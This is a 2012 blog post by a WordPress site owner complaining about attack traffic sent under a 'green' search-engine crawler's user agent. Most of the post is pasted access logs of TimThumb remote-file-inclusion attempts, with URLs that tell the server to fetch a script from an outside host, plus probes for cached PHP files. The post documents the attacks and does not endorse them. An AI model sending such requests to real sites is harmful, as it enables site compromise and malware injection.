I guess everyone wants to be green. Why not spammers?
Today, I got hit by this:
188.165.198.194 ( ns3.sensomedia.com : FR ), - -, [04/Jan/2012:10:55:09], "GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1", - , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
For those wondering: Is this really spam? Well, do not load the blue url in the address bar. You’ll get a scary banned message because it contains the very dangerous “timthumb.php?src=http”//yada_yada_yada” pattern. That is an attempt to upload a script that would do something. What I do not know. Possibly inject viagra ads into my blog. Maybe it wants to turn my blog into a zombie-bot so it can make my bog try to inject viagra ads into your blog. Whatever it is doing, it is not good.
Now, for the “green” part. Notice the “Gigabot/3.0 (http://www.gigablast.com/spider.html) bit? I googled around and discovered the Gigabot spider makes this claim:
The Green Search Engine
Serving close to ten million queries per day, mostly through other websites, Gigablast is
the leading clean-energy search engine. 90% of its power usage comes from wind energy.Gigablast also makes it easy to perform your query on the coal-based search engines
by clicking links below the search results. So try us first, and if you don’t find what you
want, click the others.
Interesting. Of course, like it or not, web spiders use energy in the form of among other things:
- electricity to power their own servers.
- electricity of servers they hit. That would be the server that runs my blog.
- electricity to run everything that communicates information between my server and their server.
Presumably, Gigabot is green because the power their servers with wind energy.
Of course, if their spider is roving around loading a bazillion wrong addresses the 10% energy savings from wind used by their bot must be outbalanced by the energy used by the numerous unnecessary hits to my server. Here’s a sample:
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:09], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:10], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:10], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:11], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:11], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:12], “GET, rankexploits.com, //wp-content/plugins/cms-pack/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:12], “GET, rankexploits.com, //wp-content/plugins/cms-pack/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:12], “GET, rankexploits.com, //wp-content/plugins/cms-pack/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:12], “GET, rankexploits.com, //wp-content/plugins/cms-pack/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:13], “GET, rankexploits.com, //wp-content/plugins/cms-pack/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:13], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:13], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:14], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:14], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:55:15], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:09], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:10], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:10], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:12], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:12], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:13], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:14], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:15], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:15], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:15], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:16], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:16], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:16], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:17], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:17], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:18], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:18], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:19], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:19], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:19], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:20], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:21], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:21], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:21], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:22], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:23], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:24], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:24], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:26], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:56:26], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:11], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:11], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:12], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:12], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:12], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/verve-meta-boxes/tools/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:13], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:13], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:14], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:14], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:15], “GET, rankexploits.com, //wp-content/plugins/verve-meta-boxes/tools/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:15], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:17], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:17], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:17], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:18], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/verve-meta-boxes/tools/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:40], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:40], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:41], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:41], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:41], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:42], “GET, rankexploits.com, //wp-content/plugins/cms-pack/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:42], “GET, rankexploits.com, //wp-content/plugins/cms-pack/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:42], “GET, rankexploits.com, //wp-content/plugins/cms-pack/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:43], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:43], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/cache/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:43], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/cache/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:44], “GET, rankexploits.com, //wp-content/plugins/cms-pack/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:44], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/temp/external_4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:44], “GET, rankexploits.com, //wp-content/plugins/cms-pack/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:44], “GET, rankexploits.com, /protect/2011/12/ip-78-46-173-3-sure-wants-to-hack-in//wp-content/plugins/cms-pack/temp/4ef5475b54a2f9bddf06cdbf8f2f27ca.php, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
188.165.198.194 ( ns3.sensomedia.com : FR ), – -, [04/Jan/2012:10:57:44], “GET, rankexploits.com, /protect/2011/12//wp-content/plugins/cms-pack/timthumb.php?src=?src=http://www.reel.com.tr/modules/mod_spo/wpsid.txt, q= ,HTTP/1.1”, – , Gigabot/3.0 (http://www.gigablast.com/spider.html), , FR, c= close, direct 404 ,
